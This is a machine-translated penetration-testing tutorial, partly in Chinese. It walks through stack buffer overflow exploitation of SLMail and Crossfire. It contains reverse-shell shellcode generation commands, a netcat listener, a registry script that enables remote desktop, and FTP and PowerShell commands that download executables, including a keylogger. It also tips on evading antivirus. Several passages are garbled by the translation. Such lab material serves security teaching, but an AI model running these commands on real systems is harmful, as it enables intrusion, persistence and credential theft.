Linux Penetration Testing Tutorial: Teach you step-by-step on stack overflow from getting started to giving up

The content of the notes refers to the KaliLinux penetration testing tutorial by Teacher Yuan Fanghong of the Security Niu Classroom

The crux of all vulnerabilities comes from the input of data. The principle of buffer overflow is that the boundary between data and code is blurred. When the buffer boundary limit is not strict, the buffer will be damaged due to malformed data passed into the variable or program operation error. "Extremely violent", thereby covering the data in adjacent video memory areas, successfully changing the video memory data, which can lead to process kidnapping, execution of malicious code, and acquisition of server control.

To better understand the principle of buffer overflow, please refer to the article reprinted by the author:

Teach you step by step about stack overflow from getting started to giving up (Part 1)

Teach you step by step about stack overflow from getting started to giving up (Part 2)

Article Directory

1. Ways to discover vulnerabilities (1) Source code audit

Software developers may use social engineering and other methods to obtain the source code for review and debugging. The conditions are strict and the source code is usually unavailable.

(2) Reverse Engineering (ReverseEngineering)

Use reverse engineering to obtain assembly source code for analysis. Assembly code analysis requires a large workload and is difficult.

(3) Fuzzing

is a way to discover software vulnerabilities by providing unexpected input to the target system and monitoring abnormal results. Generally, a valid input and random deviation are used to complete this, and software debugging tools (such as: ImmunityDebugger).

2. Fuzz testing process

First of all, we need to understand some security protection technologies for buffer overflow, because this protection mechanism needs to be avoided during the fuzz testing process.

(1)Windows

The test software is 'SLMail5.5.0MailServer', and its PASS command has a buffer overflow vulnerability. Basic idea: (Use ImmunityDebugger as debugging tool)

1. Use a python script to test whether the PASS command will overflow when it receives a large amount of data. Usually, if there is no overflow after 3000 characters, it means there should be no overflow vulnerability.

2. After discovering the overflow vulnerability, determine the address corresponding to the EIP. The basic methods are: binary method and unique string method. The unique string method can be generated with the metasploit script usr/share/metasploit-framework/tools/pattern_create.rb3000.

3. Change the EIP to the video memory address corresponding to the Shellcode, write the Shellcode to the address space, the program reads the EIP register value, jumps to the shellcode code segment and executes it.

4. Through the debugging tool, we found that after the sent data fills the EIP, it will then fill the space pointed to by ESP, so we put the Shellcode at the location of ESP.

5. Determine the distance from the ESP address to the bottom of the stack Linux anti-buffer overflow, that is, the size of the Shellcode that can be stored. Use a python script to send data to the software for testing, and debug the software to see how much data is stored in the space pointed to by the ESP. The memory space view of modern computer system processes is shown in the figure:

Figure 1 Process memory space view

6. Due to the ASLR mechanism, the address of the function call stack changes randomly every time the software runs, so hard coding is not feasible. The alternative is to find the system module with a fixed address in the video memory, and find the address jump of the JMPESP instruction in the module. Then this command directly jumps to ESP, and then executes the shellcode. Use the mona.py script to identify the video memory module. Search for the module where "returnaddress" is the JMPESP command and find the system module that is not protected by DEP and ASLR mechanisms!monamodules. With the help of /usr/share/metasploit-framework/tools/nasm_shell.rb converts the assembly instruction jmpesp to two's complement to FFE4, and searches for the FFE4 instruction in the module!monafind-s "xffxe4"-mslmfc.dll. After finding the address of the instruction, Fill in the address into the EIPlinux version of qq, construct the Shellcode, and remove bad characters: /msfpayloadwin32_reverseLHOST=192.168.20.8LPORT=443R|./msfencode-b"x00x0ax0d

Note: The payload selected when constructing the Shellcode is a reverse connection instead of a direct connection to bind. This can avoid the blocking strategy of the firewall.

7. Finally, enable port eavesdropping nc-vlp443. After the Shellcode is executed, exit the entire process using the ExitProcess method, which will cause the SMS service to crash. Slmail is a thread-based application. Applying the ExitThread method can prevent the entire service from crashing and achieve duplication. Overflow:/msfpayloadwin32_reverseLHOST=192.168.20.8EXITFUNC=threadLPORT=443R|./msfencode-b"x00x0ax0d"

Note: Different types of programs, protocols, and vulnerabilities will consider individual characters to be bad characters. Those characters have fixed uses, so bad characters cannot appear in the return address, Shellcode, or buffer. Send 0x00-0xff256 characters and find all bad characters. Bad characters can be encoded with the help of metasploit script ./msfencode.

8. If you want to further control the attack target, you can open the remote desktop by changing the registry. More than 90% of the configurations in Windows can be completed by changing the registry:

<span class="token function">echo</span> Windows Registry Editor Version 5<span class="token punctuation">.</span>00>3389<span class="token punctuation">.</span>reg
<span class="token function">echo</span> <span class="token namespace">[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
Server]</span>>>3389<span class="token punctuation">.</span>reg
<span class="token function">echo</span> <span class="token string">"fDenyTSConnections"</span>=dword:00000000>>3389<span class="token punctuation">.</span>reg
<span class="token function">echo</span> <span class="token namespace">[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
ServerWdsrdpwdTdstcp]</span>>>3389<span class="token punctuation">.</span>reg
<span class="token function">echo</span> <span class="token string">"PortNumber"</span>=dword:00000d3d>>3389<span class="token punctuation">.</span>reg
<span class="token function">echo</span> <span class="token namespace">[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal
ServerWinStationsRDP-Tcp]</span>>>3389<span class="token punctuation">.</span>reg
<span class="token function">echo</span> <span class="token string">"PortNumber"</span>=dword:00000d3d>>3389<span class="token punctuation">.</span>reg
regedit <span class="token operator">/</span>s 3389<span class="token punctuation">.</span>reg

(2)Linux

The test software is 'Crossfire', and 1.9.0 has a buffer overflow vulnerability when accepting inbound socket connections. The basic idea is the same as Windows Fuzzing (edb is used as debugging tool), so I won’t go into details. You need to pay attention to the following points:

1. Debug command: edb--run/usr/games/crossfire/bin/crossfire

2. When verifying the buffer overflow, we found that only when the payload is fixed at 4368 bytes, the value of EIP can be accurately covered. In this way, the space pointed to by ESP only has 7 bytes left, which is not enough to put down the Shellcode, so we searched it in edb. The register that can be completely covered by data finds EAX, so as a workaround, ESP jumps to EAX to execute Shellcode.

3. Select and change EXP

There are help codes (EXP) for various software vulnerabilities that have been published for a long time on the Internet. We can choose a trustworthy EXP source and conduct research or changes on this basis, especially Shellcode cannot easily use linux anti-buffer Overflow may contain viruses. When using Linux systems, programming languages ​​that need to be mastered generally include Python, C, C, Ruby, etc. Several reliable EXP sources:

After receiving EXP, you need to pay attention to the following points:

4. Post-vulnerability stage

Includes further operations such as uploading tools, elevating privileges, erasing attack traces, and installing side doors. Only file upload operations are discussed here. File upload is the basis for pre-installing Trojans and installing side doors. It is mainly based on the obtained information about the target operating system. shell, perform file upload operations.

（一）Windows

首先须要了解，用nc侦听端口取得的shell是非交互shell，这样在一些须要交互的环境操作受限，例如tab难以手动补全、一些参数难以交互输入等，所以须要上传其他的远控程序，如灰肉鸽。这儿主要讨论怎样上传这种远控程序：

1.Linux端：配置ftp服务

登陆FTP有三种形式：

<span class="token function">apt-get</span> <span class="token function">install</span> vsftpd <span class="token comment">#Linux中ftp服务有很多，这里使用vsftpd</span>
vim /etc/vsftpd/vsftpd.conf<span class="token comment">#配置vsftpd服务，这里采用系统用户登录的方式</span>
<span class="token comment">#添加配置</span>
local_root<span class="token operator">=</span>/home/ftpduser/ <span class="token comment">#系统用户登录后的主目录</span>
<span class="token comment">#可以设置用户独立配置文件保存目录：user_config_dir=/etc/vsftpd/ftpduser_config/ </span>
<span class="token comment">#对特定的用户ftpuser1可以单独进行配置，方法是在user_config_dir指定的目录下建立ftpuser1文件(和用户名相同的文件)，然后在其中写上配置内容</span>
chroot_local_user<span class="token operator">=</span>YES <span class="token comment">#该值为YES时，所有用户只能限制在其主目录下访问</span>
chroot_list_enable<span class="token operator">=</span>NO<span class="token comment">#该值为YES时，其中的用户即为与chroot_list_file中相例外的用户;为NO时，没有例外的用户。</span>
chroot_list_file<span class="token operator">=</span>/etc/vsftpd.chroot_list
<span class="token comment">#如chroot_local_user=NO，chroot_list_enable=YES，此时所有用户都可以访问任何目录，而chroot_list_file中的用户只能访问其主目录</span>
userlist_deny<span class="token operator">=</span>NO <span class="token comment">#该值为YES时，/etc/vsftpd/user_list文件中指定的用户不能访问FTP服务器；值为NO时,则仅允许指定的用户访问FTP服务器</span>
userlist_enable<span class="token operator">=</span>YES<span class="token comment">#/etc/vsftpd/user_list文件有效</span>
<span class="token keyword">echo</span> ftpduser1 <span class="token operator">>></span> /etc/vsftpd/user_list<span class="token comment">#这个文件禁止或允许使用vsftpd的用户列表文件</span>
<span class="token comment">#！！注意user_list文件中的用户列表和ftpusers不同，ftpusers不受任何配制项的影响，它是一个黑名单，总是有效</span>
<span class="token function">mkdir</span> /home/ftpduser
<span class="token function">useradd</span> -d /home/ftpduser/ftpuser1 -s /sbin/nologin ftpduser1
<span class="token function">service</span> vsftpd start

2.Windows端：因为系统缺乏预装的下载工具，所以须要自行配置

（1）使用ftp传输文件

由于非交互shell未能登入ftp服务，所以编撰ftp配置脚本。

<span class="token function">echo</span> open 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>1<span class="token punctuation">.</span>2 21>ftp<span class="token punctuation">.</span>txt
<span class="token function">echo</span> ftpduser1>>ftp<span class="token punctuation">.</span>txt
<span class="token function">echo</span> passw0rd>>ftp<span class="token punctuation">.</span>txt
<span class="token function">echo</span> bin>>ftp<span class="token punctuation">.</span>txt
<span class="token function">echo</span> GET whoami<span class="token punctuation">.</span>exe>>ftp<span class="token punctuation">.</span>txt
<span class="token function">echo</span> GET klogger<span class="token punctuation">.</span>exe>>ftp<span class="token punctuation">.</span>txt
<span class="token function">echo</span> bye>>ftp<span class="token punctuation">.</span>txt
ftp <span class="token operator">-</span>s:ftp<span class="token punctuation">.</span>txt

（2）使用powershell传输文件

<span class="token function">echo</span> <span class="token variable">$storageDir</span> = <span class="token variable">$pwd</span>
<span class="token variable">$webclient</span> = <span class="token function">New-Object</span> System<span class="token punctuation">.</span>Net<span class="token punctuation">.</span>WebClient
<span class="token variable">$url</span> = <span class="token string">"http://192.168.1.2/whoami.exe"</span>
<span class="token variable">$file</span> = <span class="token string">"new-exploit.exe"</span>
<span class="token variable">$webclient</span><span class="token punctuation">.</span>DownloadFile<span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">.</span><span class="token variable">$file</span><span class="token punctuation">)</span>
powershell<span class="token punctuation">.</span>exe <span class="token operator">-</span>ExecutionPolicy Bypass <span class="token operator">-</span>Nologo <span class="token operator">-</span>NonInteractive <span class="token operator">-</span>Noprofile <span class="token operator">-</span>File wget<span class="token punctuation">.</span>ps1

（二）Linux

借助netcat、curl、wget等系统自带的工具上传文件，比较容易实现，不再赘言。

注意：上传的文件要防止被目标系统杀毒软件去除，尽量使用合法的远程控制软件，如nc。

The above is the detailed content of Linux Penetration Testing Tutorial: Teach you step-by-step on stack overflow from getting started to giving up. For more information, please follow other related articles on the PHP Chinese website!